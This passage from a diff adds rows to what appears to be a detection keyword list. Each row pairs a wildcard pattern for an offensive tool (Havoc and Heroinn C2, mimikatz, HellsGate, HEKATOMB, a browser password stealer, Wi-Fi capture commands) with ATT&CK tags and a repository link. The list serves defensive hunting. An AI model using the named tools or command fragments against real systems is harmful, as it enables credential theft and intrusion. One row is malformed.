+"*Havoc/pkg*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Havoc/Teamserver*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc_agent.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 
- T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc_agent_talon.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc_default.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc_externalc2*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc_service_connect*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc-c2-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havoc-c2-data*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*havocframework.com*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*HavocService*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*HavocTalonInteract*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*HavocUi.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*HavocUi.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*HavocUI.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*hccapx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*hci_oracle_passwords*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*hcxdumptool*","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. 
Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","10","1555","374","2023-10-02T15:51:15Z","2018-02-25T08:18:40Z"
+"*hcxhashtool -i *.hashcat --info stdout*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*hcxpcapngtool --all -o *.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*hcxpcapngtool -o *.hashcat *.pcapng*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*hd-launch-cmd *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*headers/exploit.h*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
+"*headers/HandleKatz.h*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 
- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10",,"N/A",,,
+"*--headless --disable-gpu --disable-logging --dump-dom https://getip.pro*","greyware_tool_keyword","ducktail","infostealer command to retrieve public ip address","T1596 - T1590.005","TA0043 - TA0007 - TA0009","Ducktail ","N/A","Reconnaissance","https://www.trendmicro.com/en_be/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
+"*HeapCrypt-main*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z"
+"*HeapEncryptDecrypt.cpp*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z"
+"*HeapEncryptDecrypt.exe*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while 
sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z"
+"*HeapEncryptDecrypt.sln*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z"
+"*HeapEncryptDecrypt.vcxproj*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z"
+"*HeartBleed*","offensive_tool_keyword","HeartBleed","Heart Bleed scanner ","T1222 - T1110 - T1046","TA0007 - TA0001 - TA0002","N/A","N/A","Web Attacks","https://github.com/TechnicalMujeeb/HeartBleed","1","0","N/A","N/A","1","26","4","2018-04-14T04:21:39Z","2018-04-14T04:06:16Z"
+"*hekatomb-*.tar.gz*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
+"*hekatomb*-hashes *","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
+"*hekatomb-*-py3-none-any.whl*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
+"*hekatomb@thiefin.fr*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
+"*hekatomb_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Hello from DCShadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. 
mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*Hello From sadsad Team*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*HelloReflectionWorld.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*hellsgate.asm*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z"
+"*HellsGate.exe*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z"
+"*HellsGate.sln*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z"
+"*HellsGate.vcxproj*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z"
+"*help\dll.txt*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
+"*helpers.gpoddity_smbserver*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*Henkru/cs-token-vault*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z"
+"*henry-richard7/Browser-password-stealer*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*Heroinn FTP*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*heroinn_client*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*heroinn_core*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*heroinn_ftp*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*heroinn_shell*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*heroinn_util*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*HeroinnApp*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*HeroinnProtocol*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*HeroinnServerCommand*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*hfiref0x/UACME*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*hfiref0x/WDExtract*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*hhdobjgopfphlmjbmnpglhfcgppchgje*","greyware_tool_keyword","AdGuard VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*Hibr2Dmp.exe*","offensive_tool_keyword","Hibr2Dmp","Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z"
